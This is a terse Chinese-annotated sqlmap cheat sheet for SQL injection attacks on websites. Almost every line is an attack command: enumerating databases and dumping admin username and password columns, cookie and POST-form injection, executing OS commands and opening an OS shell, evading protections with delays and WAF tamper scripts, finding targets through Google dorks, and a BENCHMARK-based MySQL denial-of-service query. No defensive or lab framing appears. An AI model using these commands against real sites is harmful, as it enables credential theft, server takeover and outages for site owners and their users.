access 注入
./sqlmap.py -u "url" 注入判断
./sqlmap.py -u "url" --tables 跑表
./sqlmap.py -u "url" --columns -T admin 猜解字段
./sqlmap.py -u "url" --dump -T admin -C "username,password"
mysql系列课程
sqlmap -u "url" --dbs 获取数据库
sqlmap -u "url" -D myslibrary --tables 获取数据库中的表 这里是猜解爆破数据
sqlmap -u "url" -D myslibrary --T hy_admin --columns 爆列名
sqlmap -u "url" -D myslibrary --T hy_admin -C id,user,password --dump 获取字段内容
cookie注入
sqlmap -u "url" --cookie "id=9" --table --level 2 cookie注入
sqlmap -u "url" --cookie "id=9" --columns -T admin --level 2 爆表
sqlmap -u "url" --cookie "id=9" --dump -T admin -C "username,password" --level 2
post登陆框注入
自动搜索表单
sqlmap -u "url" --forms 自动注入
sqlmap -u "url" --data "参数" 指定参数注入
交互写shell 及命令执行
sqlmap -u "url" --os-cmd=ipconfig
sqlmap -u "url" --os-shell 获取shell
伪静态注入
sqlmap -u "url?id=54*.html" --dbs 在注入的地方放一个*字键 然后进行注入
sqlmap -u "url?id=54*.html" -D preem --tables 获取表
sqlmap -u "url?id=54*.html" -D preem -T pe_user --columns 得到列
sqlmap -u "url?id=54*.html" -D preem -T pe_user --C password
sqlmap -u "url?id=54*.html" -D preem -T pe_user --C password --dump
请求延时 绕过网站的一些防护
sqlmap --dbs -u "url/40*.html" --delay 1 根据1秒来获取
sqlmap --dbs -u "url/40*.html" --safe-freq 2 2次请求之后访问一个正确界面
来把google
sqlmap -g inurl:php?id=1
mysql dos攻击
sqlmap -u "url" --sql-shell 首先获取shell
select benchmark(999999999999,0x70726f626e646f70726f62616e646f70726f62616e646ff)
绕过waf防火墙
sqlmap -u "url" -v 3 --dbs --batch --tamper "charencode.py" 可以绕过一些过滤进行注入
sqlmap -u "url" --privileges 查看当前用户权限